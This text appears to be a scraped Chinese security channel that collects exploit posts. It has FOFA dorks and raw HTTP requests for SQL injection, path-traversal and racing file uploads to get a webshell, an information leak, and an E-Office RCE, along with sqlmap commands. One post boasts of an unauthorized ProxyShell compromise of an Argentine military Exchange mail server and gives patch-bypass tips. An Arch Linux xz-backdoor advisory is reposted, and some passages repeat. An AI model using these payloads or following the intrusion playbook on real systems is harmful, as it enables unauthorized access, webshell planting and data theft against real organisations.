Jeeplus低代码开发平台存在SQL注入
app="JeePlus"
app="JeePlus"
GET /sys/user/resetPassword?&mobile=13' HTTP/1.1
Host: 106.55.237.80
Accept-Language: zh-CN,zh;q=0.9
Cookie: jeeplus.session.id=b0e0c971d60e480d951257fca488a233; JSESSIONID=81A53BFE0490DE76275E5C7FD4D78A4B
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
金石工程项目管理系统TianBaoJiLu.aspx存在SQL注入漏洞
先获取cookie(发送这个包然后在响应里看cookie)
先获取cookie(发送这个包然后在响应里看cookie)
GET / HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeAccept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedsqlmap语句
sqlmap -u "http://ip/query/shigongjihuajindu/TianBaoJiLu.aspx?id=1" --batch --cookie 'ASP.NET_SessionId=pcqx2zs4gsnqprd5cvhtodmk'
❤4
Exchange邮件系统ProxyShell攻击链复现小记,阿根廷某军队邮服系统渗透实战
之前写了关于手法的那个心得,对于如何从中危漏洞到getshell这一块没有举出详细例子解释,最近又遇到了一个阿根廷军队域名(.mil.ar)的公网资产。我认为这个资产归属听起来还是很哈人的,军✌,为了复健红队能力为了装逼 于是乎花了一个下午的时间战斗爽,最终也是成功的把这个资产捣鼓rce了
Exchange ProxyShell由三个Exchange的漏洞组成。CVE-2021-34473,SSRF漏洞;CVE-2021-34523 Exchange PowerShell BackEnd提权漏洞;最后CVE-2021-31207后台任意文件写入漏洞。有没有什么脚本能运行一下就把整个攻击链复现完呢?有的,你川哥就发送了给我一个,也是我最开始在GitHub上找到的。这个脚本复现漏洞需要邮服系统的账号密码才能完成攻击链,脚本user.txt里边有几个默认密码,运行了过后发现都不是,傻瓜式利用失败——毕竟是军队的邮服系统怎么可能这么若智,德国国防部幽默弱口123456除外。
第二个脚本,一个八百多行的硕大脚本,周一频道发的那个exchange_proxyshell.py,运行后还是失败,报错超时,连接断开服务器无响应,很正常,因为脚本毕竟是死的,这种利用过程非常复杂的漏洞作者能写出一个一般环境能用的已经相当不容易了。那就硬着头皮看原理吧
SSFR很好理解,利用Exchange自身URI解析造成的路径混乱,构造恶意请求从内网访问到不允许访问到的PowerShell端点。正常从浏览器访问mapi/nspi路径是需要输入账号密码的,利用这个漏洞就能直接访问了。代码层面的分析详见https://blog.csdn.net/qq_41874930/article/details/120037619 ,POC里边也给得很详细。利用SSRF漏洞访问端点时候大部分身份是NT Authroity/System,高权限,这个漏洞反常之处是其他漏洞权限越高越好,这个漏洞权限高到system了,system用户是没有邮箱的,导致端点鉴权过后异常反而会失败。系统鉴权是检查的是X-CommonAccessToken,所以得搞到个普通用户的token值才能调用端点,普通用户的token值怎么搞到呢?你得有邮箱账号密码登录进去抓包,这也是为什么网上的脚本需要邮箱账密才能利用。现在就陷入一个幽默死循环,我得先有token我才能getshell看你的token,但是我又得先有个token我才能getshell,跑网上脚本默认密码跑完了都不对,爆破似乎也太难了,堂堂.mil的军队邮服正常来说不会有弱口令。咋办呢?方法一,打个电话到阿根廷国防部去,哥们借你邮箱账号密码一用,不白用,等我拿到shell了改配置文件写个新的账号密码给你有借有还咱俩扯平了。方法二,参考国外大佬的文章,https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 从system“提权”到域管administrator的过程。原理是如果请求头里边不包含Token值,服务器会运行代码GET参数X-Rps-CAT的值,然后再进行反序列化来创建一个Token令牌并传入BackendRehydrationModule方法完成鉴权,这就是我们用于访问powershell接口的令牌。审计源码我们可以得到CommonAccessToken值生成的规则,
可以看到其他都是格式,这里最重要的自变量就是用户SUID和组SUID。利用之前的SSRF漏洞从/autodiscover/autodiscover.xml路径到/mapi/emsmdb路径可以得到SUID。组SUID就有点难了,这里也是为什么第二个脚本运行失败的原因。第二个脚本(地址:https://github.com/horizon3ai/proxyshell)不仅大且复杂,最生猛的地方在于在GitHub的md文件中作者就说了“No email address needs to be supplied”,我搜了一下全网各种exp脚本中过程中似乎就他一个人做到了这点。这里脚本查找组SUID和之前提过的老外那篇文章的思路是一样的,审计系统的cmdlet内容,最后发现能往RPC接口发送指定内容能够回显LegacyDn,再通过LegacyDn获取SUID。
第二个脚本也是这么做的的,为什么失败了呢。经过一整个下午半猜半查的各种尝试终于找到了原因。首先脚本是没错的,其他有这个漏洞的资产都能复现成功,问题出在阿根廷这个邮服本身。虽然ProxyShell这个链他没修复,但是他补了CVE-2018-8581这个漏洞。18年这个day是知道某个用户的sid,那么就可以模拟这个用户使用SOAP通过ews的api进行各种操作。这个漏洞的补丁正好打断了攻击链获取LegacyDn这一步。18年那个补丁是这么打的,(链接https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf?fbclid=IwAR2V0-4k2yb8dmPP5Mksd8iHYTOfE6sBwygMt4wjq3M9be8Tw6TlH0andhA),所以最后的利用还得根据网站环境的不同(参考网上的资料,我个人总结的影响因素包括三个,RFC接口版本/autodiscover服务配置情况/SOAP版本)。最常见的绕过方法是在使用LegacyDn获取sid发包的那一步发包的包体后面,burp打开hex选项卡第21行填充空字节,修改了这里第二个脚本就能运行成功了。拿到sid后使用脚本就能计算出token值,token计算器地址https://github.com/yisaditatimi/ProxyShell
最后认证后任意文件写入是在端点用了New-MailboxExportRequest这个命令,将用户的邮箱导出到指定路径,导出的格式是PST格式,这个格式的文件用了微软的置换编码,所以写明文进去是没用的,webshell还要先处理一下,webshell编码器也在yisaditatimi的那个仓库里,原理就不解释了,编码的脚本都是现成的所以我也没花功夫去搞懂这个细节。总之你可以按着我这个文章的思路一步一步去手动复现,也可以最简单的,拿我周一频道发那个脚本一键傻瓜式利用就行。如果有补丁你就加空字节/改Content-Type/soap模板参数,都不用搞懂补丁的代码,就挨个试网上的绕过方法,手动发包绕过成功后问gpt怎么用python实现,然后在原有脚本的基础上复制粘贴修改一下就行了
最后这毕竟是个军✌的东西我也不好挂txt我是真特么不想找/找不到绝对路径 ,find命令一运行就卡死 这里就跑脚本-c 执行whoami一下证明吧。完整复现视频教程:https://www.youtube.com/watch?v=LbIYPFrltdA 不得不感叹一句审出这个day的老外是真牛
之前写了关于手法的那个心得,对于如何从中危漏洞到getshell这一块没有举出详细例子解释,最近又遇到了一个阿根廷军队域名(.mil.ar)的公网资产。我认为这个资产归属听起来还是很哈人的,军✌,为了复健红队能力
Exchange ProxyShell由三个Exchange的漏洞组成。CVE-2021-34473,SSRF漏洞;CVE-2021-34523 Exchange PowerShell BackEnd提权漏洞;最后CVE-2021-31207后台任意文件写入漏洞。有没有什么脚本能运行一下就把整个攻击链复现完呢?有的,你川哥就发送了给我一个,也是我最开始在GitHub上找到的。这个脚本复现漏洞需要邮服系统的账号密码才能完成攻击链,脚本user.txt里边有几个默认密码,运行了过后发现都不是,傻瓜式利用失败——毕竟是军队的邮服系统怎么可能这么若智,德国国防部幽默弱口123456除外。
第二个脚本,一个八百多行的硕大脚本,周一频道发的那个exchange_proxyshell.py,运行后还是失败,报错超时,连接断开服务器无响应,很正常,因为脚本毕竟是死的,这种利用过程非常复杂的漏洞作者能写出一个一般环境能用的已经相当不容易了。那就硬着头皮看原理吧
SSFR很好理解,利用Exchange自身URI解析造成的路径混乱,构造恶意请求从内网访问到不允许访问到的PowerShell端点。正常从浏览器访问mapi/nspi路径是需要输入账号密码的,利用这个漏洞就能直接访问了。代码层面的分析详见https://blog.csdn.net/qq_41874930/article/details/120037619 ,POC里边也给得很详细。利用SSRF漏洞访问端点时候大部分身份是NT Authroity/System,高权限,这个漏洞反常之处是其他漏洞权限越高越好,这个漏洞权限高到system了,system用户是没有邮箱的,导致端点鉴权过后异常反而会失败。系统鉴权是检查的是X-CommonAccessToken,所以得搞到个普通用户的token值才能调用端点,普通用户的token值怎么搞到呢?你得有邮箱账号密码登录进去抓包,这也是为什么网上的脚本需要邮箱账密才能利用。现在就陷入一个幽默死循环,我得先有token我才能getshell看你的token,但是我又得先有个token我才能getshell,跑网上脚本默认密码跑完了都不对,爆破似乎也太难了,堂堂.mil的军队邮服正常来说不会有弱口令。咋办呢?
V + version + T + type + C + compress + data
if compress => decompress then if type is Windows
可以看到其他都是格式,这里最重要的自变量就是用户SUID和组SUID。利用之前的SSRF漏洞从/autodiscover/autodiscover.xml路径到/mapi/emsmdb路径可以得到SUID。组SUID就有点难了,这里也是为什么第二个脚本运行失败的原因。第二个脚本(地址:https://github.com/horizon3ai/proxyshell)不仅大且复杂,最生猛的地方在于在GitHub的md文件中作者就说了“No email address needs to be supplied”,我搜了一下全网各种exp脚本中过程中似乎就他一个人做到了这点。这里脚本查找组SUID和之前提过的老外那篇文章的思路是一样的,审计系统的cmdlet内容,最后发现能往RPC接口发送指定内容能够回显LegacyDn,再通过LegacyDn获取SUID。
payload:/o=exchange/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=970e9f8578c04ef98b1d451ef016fcc8-Administrator
第二个脚本也是这么做的的,为什么失败了呢。经过一整个下午半猜半查的各种尝试终于找到了原因。首先脚本是没错的,其他有这个漏洞的资产都能复现成功,问题出在阿根廷这个邮服本身。虽然ProxyShell这个链他没修复,但是他补了CVE-2018-8581这个漏洞。18年这个day是知道某个用户的sid,那么就可以模拟这个用户使用SOAP通过ews的api进行各种操作。这个漏洞的补丁正好打断了攻击链获取LegacyDn这一步。18年那个补丁是这么打的,(链接https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf?fbclid=IwAR2V0-4k2yb8dmPP5Mksd8iHYTOfE6sBwygMt4wjq3M9be8Tw6TlH0andhA),所以最后的利用还得根据网站环境的不同(参考网上的资料,我个人总结的影响因素包括三个,RFC接口版本/autodiscover服务配置情况/SOAP版本)。最常见的绕过方法是在使用LegacyDn获取sid发包的那一步发包的包体后面,burp打开hex选项卡第21行填充空字节,修改了这里第二个脚本就能运行成功了。拿到sid后使用脚本就能计算出token值,token计算器地址https://github.com/yisaditatimi/ProxyShell
最后认证后任意文件写入是在端点用了New-MailboxExportRequest这个命令,将用户的邮箱导出到指定路径,导出的格式是PST格式,这个格式的文件用了微软的置换编码,所以写明文进去是没用的,webshell还要先处理一下,webshell编码器也在yisaditatimi的那个仓库里,原理就不解释了,编码的脚本都是现成的所以我也没花功夫去搞懂这个细节。总之你可以按着我这个文章的思路一步一步去手动复现,也可以最简单的,拿我周一频道发那个脚本一键傻瓜式利用就行。如果有补丁你就加空字节/改Content-Type/soap模板参数,都不用搞懂补丁的代码,就挨个试网上的绕过方法,手动发包绕过成功后问gpt怎么用python实现,然后在原有脚本的基础上复制粘贴修改一下就行了
最后这毕竟是个军✌的东西我也不好挂txt
🔥3👍1
泛微E-Office10远程代码执行漏洞
body="eoffice-loading-tip" app="泛微-EOffice" body="/general/login/index.php"
xpoc -r 421 -t http://xpoc.org
body="eoffice-loading-tip"
POST- /eoffice10/server/public/api/ empower/import HTTP/1.1xpoc已提供一键检测
Host:
Content-Type: * application/x-www-form-urlencoded
type-tttt&file=fad5d6631fb8ef9e9268c1f3bcab0c11
xpoc -r 421 -t http://xpoc.org
Forwarded from Arch Linux Chinese Messages (farseerfc 😂)
xz 软件包被植入后门
简单讲:立即升级系统和容器镜像!
大家可能已经听说了 [1],xz 上游发布的 5.6.0 和 5.6.1 版本的代码包(tarball)中含有添加后门的恶意代码。
Arch Linux Security Tracker 记录了该漏洞 [2]。
xz 软件包旧于 5.6.1-2 的版本(即 5.6.0-1 和 5.6.1-1)包含该后门。
以下发布内容(release artifacts)也包含了受影响的 xz 版本:
- 安装镜像:2024.03.01 版
- 虚拟机镜像:20240301.218094 和 20240315.221711 版
- 容器镜像:任何 2024-02-24 到 2024-03-28 之间(包括这两个日期)构建的版本
受影响的发布内容已经从我们的镜像站上移除。
强烈建议不要使用受影响这些受影响的发布内容。请下载当前的最新版本!
升级系统
如果你的系统当前安装了 xz 5.6.0-1 或 5.6.1-1,强烈建议你立即进行完整系统升级:
升级容器镜像
要确定否正在使用受影响的容器镜像,使用以下命令(podman 用户):
或者(docker 用户):
所有旧于 2024-03-29 且新于 2024-02-24 的 Arch Linux 容器镜像都受到了影响。
使用以下命令升级受影响的容器镜像到最新版本(podman 用户):
或者(docker 用户):
升级之后,请确保重新构建基于受影响版本的任何容器镜像,并检查所有运行中的容器!
sshd 认证绕过 / 代码执行问题
根据上游报告 [1]:
Arch 并不直接将 openssh 链接到 liblzma,因此这种攻击途径是不可能的。可以通过以下命令来确认这一点:
但是,出于谨慎,我们建议用户通过升级系统/容器镜像移除恶意代码 —— 因为可能有其他还没有被发现的后门利用方法。
https://www.archlinuxcn.org/the-xz-package-has-been-backdoored/
简单讲:立即升级系统和容器镜像!
大家可能已经听说了 [1],xz 上游发布的 5.6.0 和 5.6.1 版本的代码包(tarball)中含有添加后门的恶意代码。
Arch Linux Security Tracker 记录了该漏洞 [2]。
xz 软件包旧于 5.6.1-2 的版本(即 5.6.0-1 和 5.6.1-1)包含该后门。
以下发布内容(release artifacts)也包含了受影响的 xz 版本:
- 安装镜像:2024.03.01 版
- 虚拟机镜像:20240301.218094 和 20240315.221711 版
- 容器镜像:任何 2024-02-24 到 2024-03-28 之间(包括这两个日期)构建的版本
受影响的发布内容已经从我们的镜像站上移除。
强烈建议不要使用受影响这些受影响的发布内容。请下载当前的最新版本!
升级系统
如果你的系统当前安装了 xz 5.6.0-1 或 5.6.1-1,强烈建议你立即进行完整系统升级:
pacman -Syu
升级容器镜像
要确定否正在使用受影响的容器镜像,使用以下命令(podman 用户):
podman image history archlinux/archlinux
或者(docker 用户):
docker image history archlinux/archlinux
所有旧于 2024-03-29 且新于 2024-02-24 的 Arch Linux 容器镜像都受到了影响。
使用以下命令升级受影响的容器镜像到最新版本(podman 用户):
podman image pull archlinux/archlinux
或者(docker 用户):
docker image pull archlinux/archlinux
升级之后,请确保重新构建基于受影响版本的任何容器镜像,并检查所有运行中的容器!
sshd 认证绕过 / 代码执行问题
根据上游报告 [1]:
openssh 不直接使用 liblzma。但 debian 和其他几个发行版对 openssh 打了补丁,引入了 systemd 通知支持,而 libsystemd 确实依赖于 lzma。
Arch 并不直接将 openssh 链接到 liblzma,因此这种攻击途径是不可能的。可以通过以下命令来确认这一点:
ldd "$(command -v sshd)"
但是,出于谨慎,我们建议用户通过升级系统/容器镜像移除恶意代码 —— 因为可能有其他还没有被发现的后门利用方法。
https://www.archlinuxcn.org/the-xz-package-has-been-backdoored/
❤1👍1
海康威视综合安防平台文件上传漏洞
上传过后文件会被服务器删除,利用条件竞争高频率请求文件拿shell
文件上传后的地址:/clusterMgr/123.jsp
POST /center_install/picUploadService/v1/uploadAllPackage/image HTTP/1.1
User-Agent: PostmanRuntime/7.36.1
Accept: */*
Postman-Token: 04eaee1f-c6cb-49fa-bf8e-88b839f98acc
Host: xx.xx.xx.xx
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------553898708333958420021355
Content-Length: 233
----------------------------553898708333958420021355
Content-Disposition: form-data; name="sendfile"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/123.jsp"
Content-Type: application/octet-stream
123
----------------------------553898708333958420021355--
上传过后文件会被服务器删除,利用条件竞争高频率请求文件拿shell
文件上传后的地址:/clusterMgr/123.jsp
👍2
迅饶科技X2Modbus网关GetUser 信息泄露漏洞
server="SunFull-Webs"
server="SunFull-Webs"
POST /soap/GetUser HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Content-Length: 58Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded
<GetUser><User Name="admin" Password="admin"/></GetUser>
用友crm文件上传漏洞
app.name="用友 CRM"
/tmpfile/{{path}}.tmp.php
app.name="用友 CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------269520967239406871642430066855Content-Length: 355-----------------------------269520967239406871642430066855Content-Disposition: form-data; name="file"; filename="%s.php "Content-Type: application/octet-stream<?phpinfo();sleep(8);unlink(FILE);?>-----------------------------269520967239406871642430066855Content-Disposition: form-data; name="upload"upload-----------------------------269520967239406871642430066855--
/tmpfile/{{path}}.tmp.php
